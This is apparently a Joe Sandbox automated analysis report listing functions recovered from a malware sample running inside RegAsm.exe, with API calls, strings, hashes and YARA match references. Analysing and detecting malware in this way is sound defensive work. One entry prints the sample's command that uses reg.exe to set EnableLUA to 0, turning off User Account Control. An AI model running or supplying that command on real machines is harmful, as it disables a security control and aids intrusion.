                                          Function 00443AD3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: X8p
                                          • API String ID: 0-3665062877
                                          • Opcode ID: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction ID: 2af8e1c260e5220142bf0b5f8a7e988c949d9a3a1697e0ff4d6bcf25ce69da1b
                                          • Opcode Fuzzy Hash: fcebbc467d131149bede3708c03e30a5933a8f2bf6fa192c1d79c37d30f8ae05
                                          • Instruction Fuzzy Hash: 7E01F2B26093557EFA202E786CC2F67630DCB51FBAB31033BB520612D2DB68DD40452C
                                          Function 0040A6B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                          • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                          • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSizeSleep
                                          • String ID: XQG
                                          • API String ID: 1958988193-3606453820
                                          • Opcode ID: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                          • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                          • Opcode Fuzzy Hash: 3b1a01b47bddebb3752f31eb226f8e532d480515b9e880c3ec3420bf47c2c25d
                                          • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                          Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ClassCreateErrorLastRegisterWindow
                                          • String ID: 0$MsgWindowClass
                                          • API String ID: 2877667751-2410386613
                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                          Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                          Strings
                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle$CreateProcess
                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                          • API String ID: 2922976086-4183131282
                                          • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                          • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                          • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                          Function 004433DA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll
                                          • API String ID: 4061214504-1276376045
                                          • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                          • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                          • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                          Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                          • CloseHandle.KERNEL32(?), ref: 00405140
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                          • String ID: KeepAlive | Disabled
                                          • API String ID: 2993684571-305739064
                                          • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                          • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                          Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                          • String ID: Alarm triggered
                                          • API String ID: 614609389-2816303416
                                          • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                          • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                          Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                          • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                          Strings
                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                          • API String ID: 3024135584-2418719853
                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                          Function 004413EA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                          Function 004493E5 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 0044943D
                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID:
                                          • API String ID: 1286116820-0
                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                          Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C096
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 2180151492-0
                                          • Opcode ID: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                          • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                          • Opcode Fuzzy Hash: f543a937552f8da93e04a19db783a22fe456a5d43be0b6fbf0d05b22cfeed181
                                          • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                          Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                          Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                          • __freea.LIBCMT ref: 0045129D
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID:
                                          • API String ID: 313313983-0
                                          • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                          • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                          Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                          • _free.LIBCMT ref: 0044F43F
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                          • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                          Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                          • _free.LIBCMT ref: 100071B8
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                          Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                          • _free.LIBCMT ref: 00448353
                                          • _free.LIBCMT ref: 0044837A
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                          Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                          • _free.LIBCMT ref: 10005BB4
                                          • _free.LIBCMT ref: 10005BDB
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_10000000_RegAsm.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                          Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.913240346.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000C.00000002.913228394.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.913240346.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
